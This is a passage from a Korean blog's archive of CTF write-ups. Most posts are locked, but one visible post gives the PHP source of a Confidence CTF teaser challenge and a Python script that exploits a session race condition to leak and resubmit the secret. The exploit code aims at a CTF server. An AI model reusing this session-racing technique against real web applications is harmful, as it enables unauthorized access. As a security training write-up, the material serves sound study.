'2015/04'에 해당되는 글 12건

  1. 2015.04.28 [ConfidenceCTF-teaser]Power level
  2. 2015.04.28 [ConfidenceCTF-teaser]Apache Underwear
  3. 2015.04.28 [ConfidenceCTF-teaser]Pratical-Numerology
  4. 2015.04.26 crc 정리
  5. 2015.04.25 vortex6
  6. 2015.04.25 vortex5
  7. 2015.04.25 vortex4
  8. 2015.04.25 vortex3
  9. 2015.04.25 vortex2
  10. 2015.04.25 vortex1

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

문제



<?php


function generate_secret()

{   

    return sha1("123").sha1("123");

}


session_start();


if(!isset($_SESSION['secret']))

    $_SESSION['secret'] = generate_secret();


if(!isset($_POST['guess']))

{

    echo 'Wanna play lotto? Just try to guess 320 bits.<br/><br/>'.PHP_EOL;

    highlight_file(__FILE__);

    exit;

}


$guess = $_POST['guess'];


if($guess === $_SESSION['secret'])

{

    $flag = require('flag.php');

    exit('Lucky bastard! You won the flag! ' . $flag);

}

//else...

echo "Wrong! '{$_SESSION['secret']}' != '";

echo htmlspecialchars($guess);

echo "'";


$_SESSION['secret'] = generate_secret();

 



풀이

: 쓰레드를 이용한 레이스 컨디션


#!/usr/bin/python


import thread

import httplib, urllib


guess = ""


def thread1():

    global guess

    headers = {"Content-type": "application/x-www-form-urlencoded",

               "Cookie": "PHPSESSID=123cookie"

               }

    conn = httplib.HTTPConnection("134.213.136.172", 80)

    conn.request("POST", "", "guess="+"A"*100000, headers)

    guess = conn.getresponse().read(92)[8:88]


def thread2():

    global guess


    headers = {"Content-type": "application/x-www-form-urlencoded",

               "Cookie": "PHPSESSID=123cookie"

               }

    

    while guess=="":

        pass


    conn = httplib.HTTPConnection("134.213.136.172", 80)

    conn.request("POST", "", "guess="+guess, headers)

    response = conn.getresponse()

    data = response.read()


    print data


    conn.close()


thread.start_new_thread(thread2, ())

thread.start_new_thread(thread1, ())


 

 

먼가 블로그에 올려야 겠다는 생각은 맨날 하는데.. 귀차니즘 때문에 자세히 포스팅은 안하는거 같네염..

'General News > Write-Ups' 카테고리의 다른 글

[defcon ctf 2014] shitsco  (0) 2015.05.08
[ConfidenceCTF-teaser]Pratical-Numerology  (0) 2015.04.28
HackIM nullcon 2015 exploitation100  (0) 2015.01.11
ChristmasCTF ALGO200  (0) 2014.12.26
CSAW CTF 2014 Pybabies  (0) 2014.09.26
codegate 2013 vuln200 - exploit only  (0) 2014.02.14
Posted by xer0s 트랙백 0 : 댓글 0

crc 정리

2015.04.26 17:56

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

vortex6

2015.04.25 17:16

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

vortex5

2015.04.25 17:16

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

vortex4

2015.04.25 17:16

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

vortex3

2015.04.25 17:15

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

vortex2

2015.04.25 17:15

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

vortex1

2015.04.25 17:15

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.